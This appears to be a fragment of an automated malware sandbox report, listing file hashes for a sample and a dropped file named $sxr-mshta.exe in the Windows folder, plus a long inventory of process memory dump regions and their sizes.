283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Windows\$sxr-mshta.exeFilesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
memory/316-105-0x000001478B340000-0x000001478B367000-memory.dmp
  Filesize: 156KB
-
memory/316-106-0x00007FFD62630000-0x00007FFD62640000-memory.dmp
  Filesize: 64KB
-
memory/616-95-0x000001ECD06A0000-0x000001ECD06C7000-memory.dmp
  Filesize: 156KB
-
memory/616-101-0x00007FFD62630000-0x00007FFD62640000-memory.dmp
  Filesize: 64KB
-
memory/616-94-0x000001ECD0670000-0x000001ECD0692000-memory.dmp
  Filesize: 136KB
-
memory/672-103-0x00007FFD62630000-0x00007FFD62640000-memory.dmp
  Filesize: 64KB
-
memory/672-97-0x000001E6D8D40000-0x000001E6D8D67000-memory.dmp
  Filesize: 156KB
-
memory/744-112-0x00007FFD62630000-0x00007FFD62640000-memory.dmp
  Filesize: 64KB
-
memory/744-111-0x000001B5A8FD0000-0x000001B5A8FF7000-memory.dmp
  Filesize: 156KB
-
memory/960-108-0x0000020887F10000-0x0000020887F37000-memory.dmp
  Filesize: 156KB
-
memory/960-109-0x00007FFD62630000-0x00007FFD62640000-memory.dmp
  Filesize: 64KB
-
memory/1064-72-0x0000026D7D3E0000-0x0000026D7D5A2000-memory.dmp
  Filesize: 1.8MB
-
memory/1064-84-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmp
  Filesize: 2.0MB
-
memory/1064-61-0x0000026D78B70000-0x0000026D78B92000-memory.dmp
  Filesize: 136KB
-
memory/1064-62-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmp
  Filesize: 2.0MB
-
memory/1064-70-0x0000026D7CB60000-0x0000026D7CBB0000-memory.dmp
  Filesize: 320KB
-
memory/1064-71-0x0000026D7CC70000-0x0000026D7CD22000-memory.dmp
  Filesize: 712KB
-
memory/1064-59-0x0000026D7C0A0000-0x0000026D7C4DE000-memory.dmp
  Filesize: 4.2MB
-
memory/1064-82-0x0000026D7CBB0000-0x0000026D7CBEC000-memory.dmp
  Filesize: 240KB
-
memory/1064-83-0x0000026D7CB10000-0x0000026D7CB5E000-memory.dmp
  Filesize: 312KB
-
memory/1064-55-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmp
  Filesize: 2.0MB
-
memory/1064-85-0x00007FFDA0C10000-0x00007FFDA0CCE000-memory.dmp
  Filesize: 760KB
-
memory/1064-86-0x0000026D7CBF0000-0x0000026D7CC26000-memory.dmp
  Filesize: 216KB
-
memory/1064-57-0x0000026D7B150000-0x0000026D7B6D6000-memory.dmp
  Filesize: 5.5MB
-
memory/1064-58-0x0000026D7B8D0000-0x0000026D7C09A000-memory.dmp
  Filesize: 7.8MB
-
memory/1064-56-0x00007FFDA0C10000-0x00007FFDA0CCE000-memory.dmp
  Filesize: 760KB
-
memory/1064-60-0x0000026D7C4E0000-0x0000026D7C592000-memory.dmp
  Filesize: 712KB
-
memory/2888-30-0x0000000140000000-0x0000000140004000-memory.dmp
  Filesize: 16KB
-
memory/2888-29-0x0000000140000000-0x0000000140004000-memory.dmp
  Filesize: 16KB
-
memory/3236-114-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB
-
memory/3236-91-0x0000000000400000-0x0000000000420000-memory.dmp
  Filesize: 128KB
-
memory/3924-23-0x0000025A66F30000-0x0000025A66F86000-memory.dmp
  Filesize: 344KB
-
memory/3924-20-0x0000025A66430000-0x0000025A66E80000-memory.dmp
  Filesize: 10.3MB
-
memory/3924-17-0x0000025A4BA40000-0x0000025A4BA64000-memory.dmp
  Filesize: 144KB
-
memory/3924-24-0x0000025A66F90000-0x0000025A66FE8000-memory.dmp
  Filesize: 352KB
-
memory/3924-19-0x00007FFDA0C10000-0x00007FFDA0CCE000-memory.dmp
  Filesize: 760KB
-
memory/3924-26-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmp
  Filesize: 2.0MB
-
memory/3924-28-0x0000025A4BA80000-0x0000025A4BA8A000-memory.dmp
  Filesize: 40KB
-
memory/3924-25-0x0000025A4BA60000-0x0000025A4BA82000-memory.dmp
  Filesize: 136KB
-
memory/3924-16-0x0000025A65EB0000-0x0000025A65ED2000-memory.dmp
  Filesize: 136KB
-
memory/3924-18-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmp
  Filesize: 2.0MB
-
memory/3924-22-0x0000025A66E80000-0x0000025A66F26000-memory.dmp
  Filesize: 664KB
-
memory/4344-32-0x0000000000400000-0x0000000000406000-memory.dmp
  Filesize: 24KB
-
memory/4344-31-0x0000000000400000-0x0000000000406000-memory.dmp
  Filesize: 24KB
-
memory/4976-89-0x00007FFDA25B0000-0x00007FFDA27A5000-memory.dmp
  Filesize: 2.0MB
-
memory/4976-87-0x0000000140000000-0x0000000140028000-memory.dmp
  Filesize: 160KB
-
memory/4976-88-0x0000000140000000-0x0000000140028000-memory.dmp
  Filesize: 160KB
-
memory/4976-92-0x0000000140000000-0x0000000140028000-memory.dmp
  Filesize: 160KB
-
memory/4976-90-0x00007FFDA0C10000-0x00007FFDA0CCE000-memory.dmp
  Filesize: 760KB